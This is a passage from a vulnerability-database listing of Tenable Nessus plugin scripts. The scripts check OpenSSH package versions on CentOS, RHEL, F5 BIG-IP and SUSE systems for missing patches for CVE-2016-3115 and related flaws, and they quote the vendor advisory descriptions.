reference:"openssh-askpass-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"openssh-clients-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"openssh-keycat-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"openssh-ldap-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"openssh-server-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"openssh-server-sysvinit-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"pam_ssh_agent_auth-0.9.3-9.25.el7_2")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh / openssh-askpass / openssh-clients / openssh-keycat / etc"); }

NASL family	F5 Networks Local Security Checks
NASL id	F5_BIGIP_SOL93532943.NASL
description	Multiple CRLF injection vulnerabilities in session.c in sshd in OpenSSH before 7.2p2 allow remote authenticated users to bypass intended shell-command restrictions via crafted X11 forwarding data, related to the (1) do_authenticated1 and (2) session_x11_req functions. (CVE-2016-3115)
last seen	2020-06-01
modified	2020-06-02
plugin id	101859
published	2017-07-21
reporter	This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/101859
title	F5 Networks BIG-IP : SSHD session.c vulnerability (K93532943)
code	# # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from F5 Networks BIG-IP Solution K93532943. # # The text description of this plugin is (C) F5 Networks. # include("compat.inc"); if (description) { script_id(101859); script_version("3.5"); script_cvs_date("Date: 2019/01/04 10:03:40"); script_cve_id("CVE-2016-3115"); script_name(english:"F5 Networks BIG-IP : SSHD session.c vulnerability (K93532943)"); script_summary(english:"Checks the BIG-IP version."); script_set_attribute( attribute:"synopsis", value:"The remote device is missing a vendor-supplied security patch." ); script_set_attribute( attribute:"description", value: "Multiple CRLF injection vulnerabilities in session.c in sshd in OpenSSH before 7.2p2 allow remote authenticated users to bypass intended shell-command restrictions via crafted X11 forwarding data, related to the (1) do_authenticated1 and (2) session_x11_req functions. (CVE-2016-3115)" ); script_set_attribute( attribute:"see_also", value:"https://support.f5.com/csp/article/K93532943" ); script_set_attribute( attribute:"solution", value: "Upgrade to one of the non-vulnerable versions listed in the F5 Solution K93532943." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"potential_vulnerability", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_access_policy_manager"); script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_advanced_firewall_manager"); script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_application_acceleration_manager"); script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_application_security_manager"); script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_application_visibility_and_reporting"); script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_global_traffic_manager"); script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_link_controller"); script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_local_traffic_manager"); script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_policy_enforcement_manager"); script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_wan_optimization_manager"); script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_webaccelerator"); script_set_attribute(attribute:"cpe", value:"cpe:/h:f5:big-ip"); script_set_attribute(attribute:"cpe", value:"cpe:/h:f5:big-ip_protocol_security_manager"); script_set_attribute(attribute:"patch_publication_date", value:"2016/04/27"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/07/21"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"F5 Networks Local Security Checks"); script_dependencies("f5_bigip_detect.nbin"); script_require_keys("Host/local_checks_enabled", "Host/BIG-IP/hotfix", "Host/BIG-IP/modules", "Host/BIG-IP/version", "Settings/ParanoidReport"); exit(0); } include("f5_func.inc"); if ( ! get_kb_item("Host/local_checks_enabled") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); version = get_kb_item("Host/BIG-IP/version"); if ( ! version ) audit(AUDIT_OS_NOT, "F5 Networks BIG-IP"); if ( isnull(get_kb_item("Host/BIG-IP/hotfix")) ) audit(AUDIT_KB_MISSING, "Host/BIG-IP/hotfix"); if ( ! get_kb_item("Host/BIG-IP/modules") ) audit(AUDIT_KB_MISSING, "Host/BIG-IP/modules"); sol = "K93532943"; vmatrix = make_array(); if (report_paranoia < 2) audit(AUDIT_PARANOID); # AFM vmatrix["AFM"] = make_array(); vmatrix["AFM"]["affected" ] = make_list("12.0.0-12.1.2","11.4.0-11.6.3"); vmatrix["AFM"]["unaffected"] = make_list("14.0.0","13.0.0","12.1.3"); # AM vmatrix["AM"] = make_array(); vmatrix["AM"]["affected" ] = make_list("12.0.0-12.1.2","11.4.0-11.6.3"); vmatrix["AM"]["unaffected"] = make_list("14.0.0","13.0.0","12.1.3"); # APM vmatrix["APM"] = make_array(); vmatrix["APM"]["affected" ] = make_list("12.0.0-12.1.2","11.4.0-11.6.3","11.2.1","10.2.1-10.2.4"); vmatrix["APM"]["unaffected"] = make_list("14.0.0","13.0.0","12.1.3"); # ASM vmatrix["ASM"] = make_array(); vmatrix["ASM"]["affected" ] = make_list("12.0.0-12.1.2","11.4.0-11.6.3","11.2.1","10.2.1-10.2.4"); vmatrix["ASM"]["unaffected"] = make_list("14.0.0","13.0.0","12.1.3"); # AVR vmatrix["AVR"] = make_array(); vmatrix["AVR"]["affected" ] = make_list("12.0.0-12.1.2","11.4.0-11.6.3"); vmatrix["AVR"]["unaffected"] = make_list("14.0.0","13.0.0","12.1.3"); # LC vmatrix["LC"] = make_array(); vmatrix["LC"]["affected" ] = make_list("12.0.0-12.1.2","11.4.0-11.6.3","11.2.1","10.2.1-10.2.4"); vmatrix["LC"]["unaffected"] = make_list("14.0.0","13.0.0","12.1.3"); # LTM vmatrix["LTM"] = make_array(); vmatrix["LTM"]["affected" ] = make_list("12.0.0-12.1.2","11.4.0-11.6.3","11.2.1","10.2.1-10.2.4"); vmatrix["LTM"]["unaffected"] = make_list("14.0.0","13.0.0","12.1.3"); # PEM vmatrix["PEM"] = make_array(); vmatrix["PEM"]["affected" ] = make_list("12.0.0-12.1.2","11.4.0-11.6.3"); vmatrix["PEM"]["unaffected"] = make_list("14.0.0","13.0.0","12.1.3"); if (bigip_is_affected(vmatrix:vmatrix, sol:sol)) { if (report_verbosity > 0) security_warning(port:0, extra:bigip_report_get()); else security_warning(0); exit(0); } else { tested = bigip_get_tested_modules(); audit_extra = "For BIG-IP module(s) " + tested + ","; if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version); else audit(AUDIT_HOST_NOT, "running any of the affected modules"); }

NASL family	CentOS Local Security Checks
NASL id	CENTOS_RHSA-2016-0466.NASL
description	Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD
last seen	2020-06-01
modified	2020-06-02
plugin id	90069
published	2016-03-22
reporter	This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/90069
title	CentOS 6 : openssh (CESA-2016:0466)
code	# # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Red Hat Security Advisory RHSA-2016:0466 and # CentOS Errata and Security Advisory 2016:0466 respectively. # include("compat.inc"); if (description) { script_id(90069); script_version("2.8"); script_cvs_date("Date: 2020/01/02"); script_cve_id("CVE-2015-5600", "CVE-2016-3115"); script_xref(name:"RHSA", value:"2016:0466"); script_name(english:"CentOS 6 : openssh (CESA-2016:0466)"); script_summary(english:"Checks rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote CentOS host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These packages include the core files necessary for both the OpenSSH client and server. It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions. (CVE-2016-3115) It was discovered that the OpenSSH sshd daemon did not check the list of keyboard-interactive authentication methods for duplicates. A remote attacker could use this flaw to bypass the MaxAuthTries limit, making it easier to perform password guessing attacks. (CVE-2015-5600) All openssh users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the OpenSSH server daemon (sshd) will be restarted automatically." ); # https://lists.centos.org/pipermail/centos-announce/2016-March/021745.html script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?e1e33f57" ); script_set_attribute( attribute:"solution", value:"Update the affected openssh packages." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2015-5600"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:openssh"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:openssh-askpass"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:openssh-clients"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:openssh-ldap"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:openssh-server"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:pam_ssh_agent_auth"); script_set_attribute(attribute:"cpe", value:"cpe:/o:centos:centos:6"); script_set_attribute(attribute:"vuln_publication_date", value:"2015/08/03"); script_set_attribute(attribute:"patch_publication_date", value:"2016/03/21"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/03/22"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"CentOS Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/CentOS/release", "Host/CentOS/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/CentOS/release"); if (isnull(release) \|\| "CentOS" >!< release) audit(AUDIT_OS_NOT, "CentOS"); os_ver = pregmatch(pattern: "CentOS(?: Linux)? release ([0-9]+)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "CentOS"); os_ver = os_ver[1]; if (! preg(pattern:"^6([^0-9]\|$)", string:os_ver)) audit(AUDIT_OS_NOT, "CentOS 6.x", "CentOS " + os_ver); if (!get_kb_item("Host/CentOS/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "CentOS", cpu); flag = 0; if (rpm_check(release:"CentOS-6", reference:"openssh-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"CentOS-6", reference:"openssh-askpass-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"CentOS-6", reference:"openssh-clients-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"CentOS-6", reference:"openssh-ldap-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"CentOS-6", reference:"openssh-server-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"CentOS-6", reference:"pam_ssh_agent_auth-0.9.3-114.el6_7")) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : rpm_report_get() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh / openssh-askpass / openssh-clients / openssh-ldap / etc"); }

NASL family	SuSE Local Security Checks
NASL id	SUSE_SU-2016-1386-1.NASL
description	This update for OpenSSH fixes three security issues. These security issues were fixed : - CVE-2016-3115: Sanitise input for xauth(1) (bsc#970632) - CVE-2016-1908: Prevent X11 SECURITY circumvention when forwarding X11 connections (bsc#962313) - CVE-2015-8325: Ignore PAM environment when using login (bsc#975865) The update package also includes non-security fixes. See advisory for details. Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-01
modified	2020-06-02
plugin id	91318
published	2016-05-25
reporter	This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/91318
title	SUSE SLED12 / SLES12 Security Update : openssh (SUSE-SU-2016:1386-1)
code	# # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from SUSE update advisory SUSE-SU-2016:1386-1. # The text itself is copyright (C) SUSE. # include("compat.inc"); if (description) { script_id(91318); script_version("2.11"); script_cvs_date("Date: 2019/09/11 11:22:13"); script_cve_id("CVE-2015-8325", "CVE-2016-1908", "CVE-2016-3115"); script_name(english:"SUSE SLED12 / SLES12 Security Update : openssh (SUSE-SU-2016:1386-1)"); script_summary(english:"Checks rpm output for the updated packages."); script_set_attribute( attribute:"synopsis", value:"The remote SUSE host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "This update for OpenSSH fixes three security issues. These security issues were fixed : - CVE-2016-3115: Sanitise input for xauth(1) (bsc#970632) - CVE-2016-1908: Prevent X11 SECURITY circumvention when forwarding X11 connections (bsc#962313) - CVE-2015-8325: Ignore PAM environment when using login (bsc#975865) The update package also includes non-security fixes. See advisory for details. Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues." ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=729190" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=932483" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=945484" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=945493" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=947458" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=948902" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=960414" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=961368" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=962313" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=965576" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=970632" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=975865" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2015-8325/" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2016-1908/" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2016-3115/" ); # https://www.suse.com/support/update/announcement/2016/suse-su-20161386-1/ script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?dc6c7c3f" ); script_set_attribute( attribute:"solution", value: "To install this SUSE Security Update use YaST online_update. Alternatively you can run the command listed for your product : SUSE Linux Enterprise Server 12-SP1 : zypper in -t patch SUSE-SLE-SERVER-12-SP1-2016-818=1 SUSE Linux Enterprise Server 12 : zypper in -t patch SUSE-SLE-SERVER-12-2016-818=1 SUSE Linux Enterprise Desktop 12-SP1 : zypper in -t patch SUSE-SLE-DESKTOP-12-SP1-2016-818=1 SUSE Linux Enterprise Desktop 12 : zypper in -t patch SUSE-SLE-DESKTOP-12-2016-818=1 To bring your system up-to-date, use 'zypper patch'." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-debugsource"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-fips"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-helpers"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo"); script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:suse_linux:12"); script_set_attribute(attribute:"vuln_publication_date", value:"2016/03/22"); script_set_attribute(attribute:"patch_publication_date", value:"2016/05/23"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/05/25"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"SuSE Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/SuSE/release"); if (isnull(release) \|\| release !~ "^(SLED\|SLES)") audit(AUDIT_OS_NOT, "SUSE"); os_ver = pregmatch(pattern: "^(SLE(S\|D)\d+)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "SUSE"); os_ver = os_ver[1]; if (! preg(pattern:"^(SLED12\|SLES12)$", string:os_ver)) audit(AUDIT_OS_NOT, "SUSE SLED12 / SLES12", "SUSE " + os_ver); if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if (cpu !~ "^i[3-6]86$" && "x86_64" >!< cpu && "s390x" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "SUSE " + os_ver, cpu); sp = get_kb_item("Host/SuSE/patchlevel"); if (isnull(sp)) sp = "0"; if (os_ver == "SLES12" && (! preg(pattern:"^(0\|1)$", string:sp))) audit(AUDIT_OS_NOT, "SLES12 SP0/1", os_ver + " SP" + sp); if (os_ver == "SLED12" && (! preg(pattern:"^(0\|1)$", string:sp))) audit(AUDIT_OS_NOT, "SLED12 SP0/1", os_ver + " SP" + sp); flag = 0; if (rpm_check(release:"SLES12", sp:"1", reference:"openssh-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"1", reference:"openssh-askpass-gnome-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"1", reference:"openssh-askpass-gnome-debuginfo-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"1", reference:"openssh-debuginfo-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"1", reference:"openssh-debugsource-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"1", reference:"openssh-fips-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"1", reference:"openssh-helpers-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"1", reference:"openssh-helpers-debuginfo-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"openssh-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"openssh-askpass-gnome-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"openssh-askpass-gnome-debuginfo-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"openssh-debuginfo-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"openssh-debugsource-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"openssh-fips-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"openssh-helpers-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"openssh-helpers-debuginfo-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"openssh-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"openssh-askpass-gnome-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"openssh-askpass-gnome-debuginfo-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"openssh-debuginfo-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"openssh-debugsource-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"openssh-helpers-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"openssh-helpers-debuginfo-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"0", cpu:"x86_64", reference:"openssh-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"0", cpu:"x86_64", reference:"openssh-askpass-gnome-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"0", cpu:"x86_64", reference:"openssh-askpass-gnome-debuginfo-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"0", cpu:"x86_64", reference:"openssh-debuginfo-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"0", cpu:"x86_64", reference:"openssh-debugsource-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"0", cpu:"x86_64", reference:"openssh-helpers-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"0", cpu:"x86_64", reference:"openssh-helpers-debuginfo-6.6p1-42.1")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh"); }

NASL family	SuSE Local Security Checks
NASL id	OPENSUSE-2016-668.NASL
description	This update for OpenSSH fixes three security issues. These security issues were fixed : - CVE-2016-3115: Sanitise input for xauth(1) (bsc#970632) - CVE-2016-1908: Prevent X11 SECURITY circumvention when forwarding X11 connections (bsc#962313) - CVE-2015-8325: Ignore PAM environment when using login (bsc#975865) These non-security issues were fixed : - Fix help output of sftp (bsc#945493) - Restarting openssh with openssh-fips installed was not working correctly (bsc#945484) - Fix crashes when /proc is not available in the chroot (bsc#947458) - Correctly parse GSSAPI KEX algorithms (bsc#961368) - More verbose FIPS mode/CC related documentation in README.FIPS (bsc#965576, bsc#960414) - Fix PRNG re-seeding (bsc#960414, bsc#729190) - Disable DH parameters under 2048 bits by default and allow lowering the limit back to the RFC 4419 specified minimum through an option (bsc#932483, bsc#948902) This update was imported from the SUSE:SLE-12:Update update project.
last seen	2020-06-05
modified	2016-06-01
plugin id	91413
published	2016-06-01
reporter	This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/91413
title	openSUSE Security Update : openssh (openSUSE-2016-668)
code	#%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from openSUSE Security Update openSUSE-2016-668. # # The text description of this plugin is (C) SUSE LLC. # include("compat.inc"); if (description) { script_id(91413); script_version("2.6"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04"); script_cve_id("CVE-2015-8325", "CVE-2016-1908", "CVE-2016-3115"); script_name(english:"openSUSE Security Update : openssh (openSUSE-2016-668)"); script_summary(english:"Check for the openSUSE-2016-668 patch"); script_set_attribute( attribute:"synopsis", value:"The remote openSUSE host is missing a security update." ); script_set_attribute( attribute:"description", value: "This update for OpenSSH fixes three security issues. These security issues were fixed : - CVE-2016-3115: Sanitise input for xauth(1) (bsc#970632) - CVE-2016-1908: Prevent X11 SECURITY circumvention when forwarding X11 connections (bsc#962313) - CVE-2015-8325: Ignore PAM environment when using login (bsc#975865) These non-security issues were fixed : - Fix help output of sftp (bsc#945493) - Restarting openssh with openssh-fips installed was not working correctly (bsc#945484) - Fix crashes when /proc is not available in the chroot (bsc#947458) - Correctly parse GSSAPI KEX algorithms (bsc#961368) - More verbose FIPS mode/CC related documentation in README.FIPS (bsc#965576, bsc#960414) - Fix PRNG re-seeding (bsc#960414, bsc#729190) - Disable DH parameters under 2048 bits by default and allow lowering the limit back to the RFC 4419 specified minimum through an option (bsc#932483, bsc#948902) This update was imported from the SUSE:SLE-12:Update update project." ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=729190" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=932483" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=945484" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=945493" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=947458" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=948902" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=960414" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=961368" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=962313" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=965576" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=970632" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=975865" ); script_set_attribute( attribute:"solution", value:"Update the affected openssh packages." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh-askpass-gnome"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh-askpass-gnome-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh-cavs"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh-cavs-debuginfo"); script_set_attribute(attribute:"cpe", 